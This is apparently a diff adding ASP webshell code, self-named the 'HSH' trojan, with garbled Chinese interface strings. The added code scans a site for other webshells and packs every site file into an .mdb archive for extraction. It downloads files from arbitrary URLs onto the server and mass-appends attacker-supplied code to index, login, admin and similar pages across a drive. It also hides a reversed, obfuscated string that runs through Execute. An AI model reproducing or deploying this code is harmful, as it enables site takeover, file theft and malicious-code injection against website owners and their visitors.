+RRS "ɨ����ϣ�һ������ļ���<font color=""#FF0000"">"&SumFolders&"</font>�����ļ�<font color=""#FF0000"">"&SumFiles&"</font>�������ֿ��ɵ�<font color=""#FF0000"">"&Sun&"</font>��"
+RRS "<table width=""100%"" border=""1"" cellpadding=""0"" cellspacing=""8"" bordercolor=""#999999"" style=""font-size:12px;border-collapse:collapse;line-height:130%;clear:both;""><tr>"
+If request.Form("radiobutton") = "sws" Then
+	RRS "<td width=""20%"">�ļ����·��</td>"
+	RRS "<td width=""20%"">������</td>"
+	RRS "<td width=""40%"">����</td>"
+	RRS "<td width=""20%"">����/�޸�ʱ��</td>"
+else   
+	RRS "<td width=""50%"">�ļ����·��</td>"
+	RRS "<td width=""25%"">�ļ�����ʱ��</td>"
+	RRS "<td width=""25%"">�޸�ʱ��</td>"
+end if
+	RRS "</tr>"
+	RRS Report
+	RRS "<br/></table>"
+timer2 = timer
+thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10)
+RRS "<br><font style='font-size:12px'>��ҳִ�й�����"&thetime&"����</font>"
+	end if
+Sub ShowAllFile(Path)
+	Set F1SO = CreateObject("Scripting.FileSystemObject")
+	if not F1SO.FolderExists(path) then exit sub
+	Set f = F1SO.GetFolder(Path)
+	Set fc2 = f.files
+	For Each myfile in fc2
+		If CheckExt(F1SO.GetExtensionName(path&"\"&myfile.name)) Then
+			Call ScanFile(Path&Temp&"\"&myfile.name, "")
+			SumFiles = SumFiles + 1
+		End If
+	Next
+	Set fc = f.SubFolders
+	For Each f1 in fc
+		ShowAllFile path&"\"&f1.name
+		SumFolders = SumFolders + 1
+    Next
+	Set F1SO = Nothing
+End Sub
+Sub ScanFile(FilePath, InFile)
+Server.ScriptTimeout=999999999
+	If InFile <> "" Then
+		Infiles = "<font color=red>���ļ���<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(InFile)&""" target=_blank>"& InFile & "</a>�ļ�����ִ��</font>"
+	End If
+	Set FSO1s = CreateObject("Scripting.FileSystemObject")
+	on error resume next
+	set ofile = FSO1s.OpenTextFile(FilePath)
+	filetxt = Lcase(ofile.readall())
+	If err Then Exit Sub end if
+	if len(filetxt)>0 then
+		filetxt = vbcrlf & filetxt
+		temp = "<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace(FilePath,server.MapPath("\")&"\","",1,1,1)&"</a><br />"
+    temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a > "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a>"	
+			If instr( filetxt, Lcase("WScr"&DoMyBest&"ipt.Shell") ) or Instr( filetxt, Lcase("clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8") ) then
+				Report = Report&"<tr><td>"&temp&"</td><td>WScr"&DoMyBest&"ipt.Shell ���� clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8</td><td><font color=red>Σ�������һ�㱻ASPľ������</font>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End if
+			If instr( filetxt, Lcase("She"&DoMyBest&"ll.Application") ) or Instr( filetxt, Lcase("clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000") ) then
+				Report = Report&"<tr><td>"&temp&"</td><td>She"&DoMyBest&"ll.Application ���� clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000</td><td><font color=red>Σ�������һ�㱻ASPľ������</font>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			Set regEx = New RegExp
+			regEx.IgnoreCase = True
+			regEx.Global = True
+			regEx.Pattern = "\bLANGUAGE\s*=\s*[""]?\s*(vbscript|jscript|javascript).encode\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>(vbscript|jscript|javascript).Encode</td><td><font color=red>�ƺ��ű���������</font>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "\bEv"&"al\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>Ev"&"al</td><td>e"&"val()��������ִ������ASP����<br>����javascript������Ҳ����ʹ�ã��п������󱨡�"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "[^.]\bExe"&"cute\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>Exec"&"ute</td><td><font color=red>e"&"xecute()��������ִ������ASP����</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "\.(Open|Create)TextFile\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>.CreateTextFile|.OpenTextFile</td><td>ʹ����FSO��CreateTextFile|OpenTextFile��д�ļ�"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "\.SaveToFile\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>.SaveToFile</td><td>ʹ����Stream��SaveToFile����д�ļ�"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+			regEx.Pattern = "\.Save\b"
+			If regEx.Test(filetxt) Then
+				Report = Report&"<tr><td>"&temp&"</td><td>.Save</td><td>ʹ����XMLHTTP��Save����д�ļ�"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				temp="-ͬ��-"
+			End If
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "<!--\s*#include\s*file\s*=\s*"".*"""
+		Set Matches = regEx.Execute(filetxt)
+		For Each Match in Matches
+			tFile = Replace(Mid(Match.Value, Instr(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") - 1),"/","\")
+			If Not CheckExt(FSO1s.GetExtensionName(tFile)) Then
+				Call ScanFile( Mid(FilePath,1,InStrRev(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
+				SumFiles = SumFiles + 1
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "<!--\s*#include\s*virtual\s*=\s*"".*"""
+		Set Matches = regEx.Execute(filetxt)
+		For Each Match in Matches
+			tFile = Replace(Mid(Match.Value, Instr(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") - 1),"/","\")
+			If Not CheckExt(FSO1s.GetExtensionName(tFile)) Then
+				Call ScanFile( Server.MapPath("\")&"\"&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
+				SumFiles = SumFiles + 1
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]*|\()"".*"""
+		Set Matches = regEx.Execute(filetxt)
+		For Each Match in Matches
+			tFile = Replace(Mid(Match.Value, Instr(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") - 1),"/","\")
+			If Not CheckExt(FSO1s.GetExtensionName(tFile)) Then
+				Call ScanFile( Mid(FilePath,1,InStrRev(FilePath,"\"))&tFile, replace(FilePath,server.MapPath("\")&"\","",1,1,1) )
+				SumFiles = SumFiles + 1
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "Server.(Exec"&"ute|Transfer)([ \t]*|\()[^""]\)"
+		If regEx.Test(filetxt) Then
+			Report = Report&"<tr><td>"&temp&"</td><td>Server.Exec"&"ute</td><td><font color=red>���ܸ��ټ��Server.e"&"xecute()����ִ�е��ļ���</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+			Sun = Sun + 1
+		End If
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set XregEx = New RegExp
+		XregEx.IgnoreCase = True
+		XregEx.Global = True
+		XregEx.Pattern = "<scr"&"ipt\s*(.|\n)*?runat\s*=\s*""?server""?(.|\n)*?>"
+		Set XMatches = XregEx.Execute(filetxt)
+		For Each Match in XMatches
+			tmpLake2 = Mid(Match.Value, 1, InStr(Match.Value, ">"))
+			srcSeek = InStr(1, tmpLake2, "src", 1)
+			If srcSeek > 0 Then
+				srcSeek2 = instr(srcSeek, tmpLake2, "=")
+				For i = 1 To 50
+					tmp = Mid(tmpLake2, srcSeek2 + i, 1)
+					If tmp <> " " and tmp <> chr(9) and tmp <> vbCrLf Then
+						Exit For
+					End If
+				Next
+				If tmp = """" Then
+					tmpName = Mid(tmpLake2, srcSeek2 + i + 1, Instr(srcSeek2 + i + 1, tmpLake2, """") - srcSeek2 - i - 1)
+				Else
+					If InStr(srcSeek2 + i + 1, tmpLake2, " ") > 0 Then tmpName = Mid(tmpLake2, srcSeek2 + i, Instr(srcSeek2 + i + 1, tmpLake2, " ") - srcSeek2 - i) Else tmpName = tmpLake2
+					If InStr(tmpName, chr(9)) > 0 Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, chr(9)) - 1)
+					If InStr(tmpName, vbCrLf) > 0 Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, vbcrlf) - 1)
+					If InStr(tmpName, ">") > 0 Then tmpName = Mid(tmpName, 1, Instr(1, tmpName, ">") - 1)
+				End If
+				Call ScanFile( Mid(FilePath,1,InStrRev(FilePath,"\"))&tmpName , replace(FilePath,server.MapPath("\")&"\","",1,1,1))
+				SumFiles = SumFiles + 1
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+		Set regEx = New RegExp
+		regEx.IgnoreCase = True
+		regEx.Global = True
+		regEx.Pattern = "CreateO"&"bject[ |\t]*\(.*\)"
+		Set Matches = regEx.Execute(filetxt)
+		For Each Match in Matches
+			If Instr(Match.Value, "&") or Instr(Match.Value, "+") or Instr(Match.Value, """") = 0 or Instr(Match.Value, "(") <> InStrRev(Match.Value, "(") Then
+				Report = Report&"<tr><td>"&temp&"</td><td>Creat"&"eObject</td><td>Crea"&"teObject����ʹ���˱��μ���"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify(filepath)&"</td></tr>"
+				Sun = Sun + 1
+				exit sub
+			End If
+		Next
+		Set Matches = Nothing
+		Set regEx = Nothing
+	end if
+	set ofile = nothing
+	set FSO1s = nothing
+End Sub:Sub PageAddToMdb():Dim theAct, thePath
+theAct = Request("theAct")
+thePath = Request("thePath")
+Server.ScriptTimeOut=100000
+If theAct = "addToMdb" Then
+addToMdb(thePath)
+RRS "<div align=center><br>�������!</div>"&BackUrl
+Response.End
+End If
+If theAct = "releaseFromMdb" Then
+unPack(thePath)
+RRS "<div align=center><br>�������!</div>"&BackUrl
+Response.End
+End If
+RRS"<br>�ļ��д��:"
+RRS"<form method=post>"
+RRS"<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=80>"
+RRS"<input type=hidden value=addToMdb name=theAct>"
+RRS"<select name=theMethod><option value=fso>FSO</option><option value=app>��FSO</option>"
+RRS"</select>"
+RRS" <input type=submit value='��ʼ���'>"
+RRS"<br><br>ע: �������HSH.mdb�ļ�,λ��HSHľ��ͬ��Ŀ¼��"
+RRS"</form>"
+RRS"�ļ����⿪(��FSO֧��):<br/>"
+RRS"<form method=post>"
+RRS"<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & "\HSH.mdb"" size=80>"
+RRS" <input type=hidden value=releaseFromMdb name=theAct><input type=submit value='�⿪��'>"
+RRS"<br><br>ע: �⿪���������ļ���λ��HSHľ��ͬ��Ŀ¼��"
+RRS"</form>":
+End Sub:Sub addToMdb(thePath):On Error Resume Next
+Dim rs, conn, stream, connStr, adoCatalog
+Set rs = Server.CreateObject("ADODB.RecordSet")
+Set stream = Server.CreateObject("ADODB.Stream")
+Set conn = Server.CreateObject("ADODB.Connection")
+Set adoCatalog = Server.CreateObject("ADOX.Catalog")
+connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & Server.MapPath("HSH.mdb")
+adoCatalog.Create connStr
+conn.Open connStr
+conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED, thePath VarChar, fileContent Image)")
+stream.Open
+stream.Type = 1
+rs.Open "FileData", conn, 3, 3
+If Request("theMethod") = "fso" Then
+fsoTreeForMdb thePath, rs, stream
+ Else
+saTreeForMdb thePath, rs, stream
+End If
+rs.Close
+Conn.Close
+stream.Close
+Set rs = Nothing
+Set conn = Nothing
+Set stream = Nothing
+Set adoCatalog = Nothing:End Sub:Function fsoTreeForMdb(thePath, rs, stream):Dim item, theFolder, folders, files, sysFileList
+sysFileList = "$HSH.mdb$HSH.ldb$"
+If Server.CreateObject("Scripting.FileSystemObject").FolderExists(thePath) = False Then
+showErr(thePath & " Ŀ¼�����ڻ��߲���������!")
+End If
+Set theFolder = Server.CreateObject("Scripting.FileSystemObject").GetFolder(thePath)
+Set files = theFolder.Files
+Set folders = theFolder.SubFolders
+For Each item In folders
+fsoTreeForMdb item.Path, rs, stream
+Next
+For Each item In files
+If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
+rs.AddNew
+rs("thePath") = Mid(item.Path, 4)
+stream.LoadFromFile(item.Path)
+rs("fileContent") = stream.Read()
+rs.Update
+End If
+Next
+Set files = Nothing
+Set folders = Nothing
+Set theFolder = Nothing:End Function
+Sub unPack(thePath)
+On Error Resume Next
+Server.ScriptTimeOut=100000
+Dim rs, ws, str, conn, stream, connStr, theFolder
+str = Server.MapPath(".") & "\"
+Set rs = CreateObject("ADODB.RecordSet")
+Set stream = CreateObject("ADODB.Stream")
+Set conn = CreateObject("ADODB.Connection")
+connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & thePath & ";"
+conn.Open connStr
+rs.Open "FileData", conn, 1, 1
+stream.Open
+stream.Type = 1
+Do Until rs.Eof
+theFolder = Left(rs("thePath"), InStrRev(rs("thePath"), "\"))
+If Server.CreateObject("Scripting.FileSystemObject").FolderExists(str & theFolder) = False Then
+createFolder(str & theFolder)
+End If
+stream.SetEos()
+stream.Write rs("fileContent")
+stream.SaveToFile str & rs("thePath"), 2
+rs.MoveNext
+Loop
+rs.Close
+conn.Close
+stream.Close
+Set ws = Nothing
+Set rs = Nothing
+Set stream = Nothing
+Set conn = Nothing:End Sub:Sub createFolder(thePath)
+Dim i
+i = Instr(thePath, "\")
+Do While i > 0
+If Server.CreateObject("Scripting.FileSystemObject").FolderExists(Left(thePath, i)) = False Then
+Server.CreateObject("Scripting.FileSystemObject").CreateFolder(Left(thePath, i - 1))
+End If
+If InStr(Mid(thePath, i + 1), "\") Then
+i = i + Instr(Mid(thePath, i + 1), "\")
+ Else
+i = 0
+End If
+Loop
+End Sub:Sub saTreeForMdb(thePath, rs, stream)
+Dim item, sysFileList
+sysFileList = "$HSH.mdb$HSH.ldb$"
+Set theFolder = saX.NameSpace(thePath)
+For Each item In theFolder.Items
+If item.IsFolder = True Then
+saTreeForMdb item.Path, rs, stream
+ Else
+If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
+rs.AddNew
+rs("thePath") = Mid(item.Path, 4)
+stream.LoadFromFile(item.Path)
+rs("fileContent") = stream.Read()
+rs.Update
+End If
+End If
+Next
+Set theFolder = Nothing:End Sub:Sub createFolder(thePath):Dim i
+		i = Instr(thePath, "\")
+		Do While i > 0
+			If fsoX.FolderExists(Left(thePath, i)) = False Then
+				fsoX.CreateFolder(Left(thePath, i - 1))
+			End If
+			If InStr(Mid(thePath, i + 1), "\") Then
+				i = i + Instr(Mid(thePath, i + 1), "\")
+			 Else
+				i = 0
+			End If
+		Loop:End Sub:Function CheckExt(FileExt)
+	If DimFileExt = "*" Then CheckExt = True
+	Ext = Split(DimFileExt,",")
+	For i = 0 To Ubound(Ext)
+		If Lcase(FileExt) = Ext(i) Then 
+			CheckExt = True
+			Exit Function
+		End If
+	Next
+End Function:Function upload():SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'>" 
+		RRS "���ص�������:�޻���...Ϊ�˽�ʡ.�����޻���<br>"
+		RRS "<form method=post>"
+		RRS "<input name=theUrl value='http://' size=80><input type=submit value=' ���� '><br/>"
+		RRS "<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=80>"
+		RRS "<input type=checkbox name=overWrite value=2>���ڸ���"
+		RRS "<input type=hidden value=downFromUrl name=theAct>"
+		RRS "</form>"
+		RRS "<br>"
+		If isDebugMode = False Then
+			On Error Resume Next
+		End If
+		Dim Http, theUrl, thePath, stream, fileName, overWrite
+		theUrl = Request("theUrl")
+		thePath = Request("thePath")
+		overWrite = Request("overWrite")
+		Set stream = Server.CreateObject("ad"&e&"odb.st"&e&"ream")
+		Set Http = Server.CreateObject("MSXML2.XMLHTTP")
+		
+		If overWrite <> 2 Then
+			overWrite = 1
+		End If
+		
+		Http.Open "GET", theUrl, False
+		Http.Send()
+		If Http.ReadyState <> 4 Then 
+
+		End If
+		
+		With stream
+			.Type = 1
+			.Mode = 3
+			.Open
+			.Write Http.ResponseBody
+			.Position = 0
+			.SaveToFile thePath, overWrite
+			If Err.Number = 3004 Then
+				Err.Clear
+				fileName = Split(theUrl, "/")(UBound(Split(theUrl, "/")))
+				If fileName = "" Then
+					fileName = "index.htm.txt"
+				End If
+				thePath = thePath & "\" & fileName
+				.SaveToFile thePath, overWrite
+			End If
+			.Close
+		End With
+		chkErr(Err)
+		
+		Set Http = Nothing
+		Set Stream = Nothing
+
+		If isDebugMode = False Then
+			On Error Resume Next
+		End If:End Function	
+Function GetDateModify(filepath):Set F2SO = CreateObject("Scripting.FileSystemObject")
+    Set f = F2SO.GetFile(filepath) 
+	s = f.DateLastModified 
+	set f = nothing
+	set F2SO = nothing
+	GetDateModify = s:End Function:Function GetDateCreate(filepath):Set F3SO = CreateObject("Scripting.FileSystemObject")
+    Set f = F3SO.GetFile(filepath) 
+	s = f.DateCreated 
+	set f = nothing
+	set F3SO = nothing
+	GetDateCreate = s:End Function:Function tURLEncode(Str):temp = Replace(Str, "%", "%25")
+	temp = Replace(temp, "#", "%23")
+	temp = Replace(temp, "&", "%26")
+	tURLEncode = temp:End Function:Sub ShowAllFile2(Path):Set F4SO = CreateObject("Scripting.FileSystemObject")
+	if not F4SO.FolderExists(path) then exit sub
+	Set f = F4SO.GetFolder(Path)
+	Set fc2 = f.files
+	For Each myfile in fc2
+		If CheckExt(F4SO.GetExtensionName(path&"\"&myfile.name)) Then
+			Call IsFind(Path&"\"&myfile.name)
+			SumFiles = SumFiles + 1
+		End If
+	Next
+	Set fc = f.SubFolders
+	For Each f1 in fc
+		ShowAllFile2 path&"\"&f1.name
+		SumFolders = SumFolders + 1
+    Next
+	Set F4SO = Nothing:End Sub:Sub IsFind(thePath):theDate = GetDateModify(thePath)
+	on error resume next
+	theTmp = Mid(theDate, 1, Instr(theDate, " ") - 1)
+	if err then exit Sub
+	xDate = Split(request.Form("Search_Date"),";")
+	If request.Form("Search_Date") = "ALL" Then ALLTime = True
+	For i = 0 To Ubound(xDate)
+		If theTmp = xDate(i) or ALLTime = True Then 
+			If request("Search_Content") <> "" Then
+				Set FSO2s = CreateObject("Scripting.FileSystemObject")
+				set ofile = FSO2s.OpenTextFile(thePath, 1, false, -2)
+				filetxt = Lcase(ofile.readall())
+				If Instr( filetxt, LCase(request.Form("Search_Content"))) > 0 Then
+					temp = "<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(Replace(replace(thePath,server.MapPath("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)&"</a>"
+    temp=temp&" �� <a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a > "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a>"	
+				Report = Report&"<tr><td height=30>"&temp&"</td><td>"&GetDateCreate(thePath)&"</td><td>"&theDate&"</td></tr>"
+					Report = Report&"<tr><td>"&temp&"</td><td>"&GetDateCreate(thePath)&"</td><td>"&theDate&"</td></tr>"
+					Sun = Sun + 1
+					Exit Sub
+				End If
+				ofile.close()
+				Set ofile = Nothing
+				Set FSO2s = Nothing
+			Else
+				temp = "<a href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode(replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace(thePath,server.MapPath("\")&"\","",1,1,1)&"</a> "
+    temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'  onclick='return yesok()' class='am' title='ɾ��'>Del</a > "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+	temp=temp&"<a href='javascript:FullForm("""&replace(replace(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a>"	
+				Report = Report&"<tr><td height=30>"&temp&"</td><td>"&GetDateCreate(thePath)&"</td><td>"&theDate&"</td></tr>"
+				Sun = Sun + 1
+				Exit Sub
+			End If
+		End If
+	Next:End Sub
+Case "plgm"
+Server.ScriptTimeout=1000000 
+Response.Buffer=False 
+RRS ("<b>��ǰ��վ����·��:")&Server.MapPath("/")&("</b>")
+ASP_SELF=Request.ServerVariables("PATH_INFO") 
+s=Request("fd") 
+if s="" then s=Server.MapPath("/")
+ex=Request("ex") 
+pth=Request("pth") 
+newcnt=Request("newcnt") 
+addcode = Request("code")
+if addcode="" then addcode="<"
+If ex<>"" AND pth<>"" Then 
+select Case ex 
+Case "edit" 
+CALL file_show(pth) 
+Case "save" 
+CALL file_save(pth) 
+End select 
+Else 
+RRS("<form method=""POST""> ")
+RRS("<table width=560 border=""0"" style=""font-size:12px;"">")
+RRS("<tr>")
+RRS("<td width=""102"">Ҫ�������ļ��� (����·��)��</td>")
+RRS("<td width=""359""><input type=""text"" name=""fd"" value="""&s&""" size=60></td>")
+RRS("<td width=""69"">&nbsp;</td>")
+RRS("</tr><tr><td>Ҫ�����Ĵ���:</td>")
+RRS("<td><textarea name=""code"" cols=58 rows=""3"">"&addcode&"</textarea></td>")
+RRS("<td><input name=""submit"" type=""submit"" value=""��ʼ""></td>")
+RRS("</tr></table></form> ")
+End If
+Function IsPattern(patt,str) 
+ShiSan="fI dnE~ eslaF=nrettaPsI~ eslE~ eurT=nrettaPsI~ nehT eurT=laVter fI~ gnihtoN=xEger teS~ )rts(tseT.xEger=laVter~ eurT=esaCerongI.xEger~ ttap=nrettaP.xEger~ pxEgeR weN=xEger teS":ExeCuTe(UZSS(ShiSan)):End Function 
+if request.form("submit")<>"" then
+If s="" or addcode="" Then
+RRS "<font color=red>�����������·�������!</font>"
+response.end
+else If IsPattern("[^ab]{1}:{1}(\\|\/)",s) Then sch s 
+End If
+end if 
+Sub sch(s):oN eRrOr rEsUmE nExT 
+Set fs=Server.createObject("Scripting.FileSystemObject") 
+Set fd=fs.GetFolder(s) 
+Set fi=fd.Files 
+Set sf=fd.SubFolders 
+For Each f in fi 
+rtn=f.path 
+step_all rtn 
+Next 
+If sf.Count<>0 Then 
+For Each l In sf 
+sch l 
+Next 
+End If:End Sub:Sub step_all(agr):retVal=IsPattern("(\\|\/)(default|index|conn|admin|bbs|reg|help|upfile|upload|cart|class|login|diy|no|ok|del|config|sql|user|ubb|ftp|asp|top|new|open|name|email|img|images|web|blog|save|data|add|edit|game|about|manager|main|article|book|bt|config|mp3|vod|error|copy|move|down|system|logo|QQ|520|newup|myup|play|show|view|ip|err404|send|foot|char|info|list|shop|err|nc|ad|flash|text|admin_upfile|admin_upload|upfile_load|upfile_soft|upfile_photo|upfile_softpic|vip|505)\.(htm|html|asp|php|jsp|aspx|cgi|js)\b",agr) 
+If retVal Then 
+step1 agr 
+step2 agr 
+Else 
+Exit Sub:End If:End Sub:Sub step1(str1):RRS "<div style='line-height:20px'>�� "&str1&" _"
+RRs "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""DownFile"")' class='am' title='����'>Down</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""EditFile"")' class='am' title='�༭'>edit</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""DelFile"")'onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+RRS "<a href='javascript:FullForm("""&replace(str1,"\","\\")&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a></div>":End Sub :Sub step2(str2):Set fs=Server.createObject("Scripting.FileSystemObject") 
+isExist=fs.FileExists(str2) 
+If isExist Then 
+Set f=fs.GetFile(str2) 
+Set f_addcode=f.OpenAsTextStream(8,-2) 
+f_addcode.Write addcode 
+f_addcode.Close 
+Set f=Nothing 
+End If 
+Set fs=Nothing:End Sub:Err.Clear:Case "Cplgm":Fpath=Request("fd")
+	addcode = Request("code")
+	addcode2 = Request("code2")
+	pcfile=request("pcfile")
+	checkbox=request("checkbox")
+	ShowMsg=request("ShowMsg")
+	FType=request("FType")
+	M=request("M")
+	if Ftype="" then Ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
+	if Fpath="\" then Fpath=Server.MapPath("\")
+	if Fpath="." or Fpath="" then Fpath=Server.MapPath(".")	
+	if addcode="" then addcode="<"
+	if checkbox="" then checkbox=request("checkbox")
+	if pcfile="" then
+		pcfileName=Request.ServerVariables("SCRIPT_NAME")
+		pcfilek=split(pcfileName,"/") 
+		pcfilen=ubound(pcfilek) 
+		pcfile=pcfilek(pcfilen) 
+	end if
+  	RRS ("<b>��վ��Ŀ¼</b>- "&Server.MapPath("/")&"<br>")
+	RRS ("<b>������Ŀ¼</b>- "&Server.MapPath("."))
+	RRS "<form method=POST><div style='color:#00FF00'><b>[" 
+	if M="1" then RRS"����������-��������"
+	if M="2" then RRS"����������-������˵�����"
+	if M="3" then RRS"�����滻��-�ļ��滻�޸Ĺ���"
+	if M="" then response.end
+	RRS "]</b></div><table width=100% border=0><tr><td>�ļ�·����</td>"
+	RRS "<td><input type=text name=fd value='"&Fpath&"' size=40> �\������վ��Ŀ¼����.��Ϊ��������Ŀ¼</td></tr>"
+	if M="1" then RRS "<tr><td>�����ظ���</td><td><input class=c name='checkbox' type=checkbox value='checked' "&checkbox&"> ��ֹһ��ҳ�����ж���ظ��Ĵ���</td></tr>"
+	RRS "<tr><td>�ų��ļ���</td>"
+	RRS "<td><input name='pcfile' type=text id='pcfile' value='"&pcfile&"' size=40> ���벻�뱻�޸ĵ��ļ��������磺1.asp|2.asp|3.asp</td></tr>"
+	RRS "<tr><td>�ļ����ͣ�</td>"
+	RRS "<td><input name='FType' type=text id='FType' value='"&Ftype&"' size=40> ����Ҫ�޸ĵ��ļ�����[��չ��]�����磺htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td><font color=#00FF00>"
+	if M="1" then RRS"Ҫ�ҵ�����"
+	if M="2" then RRS"Ҫ�������"
+	if M="3" then RRS"�������ݣ�"
+	RRS"</font></td><td><textarea name=code cols=66 rows=3>"&addcode&"</textarea></td></tr>"
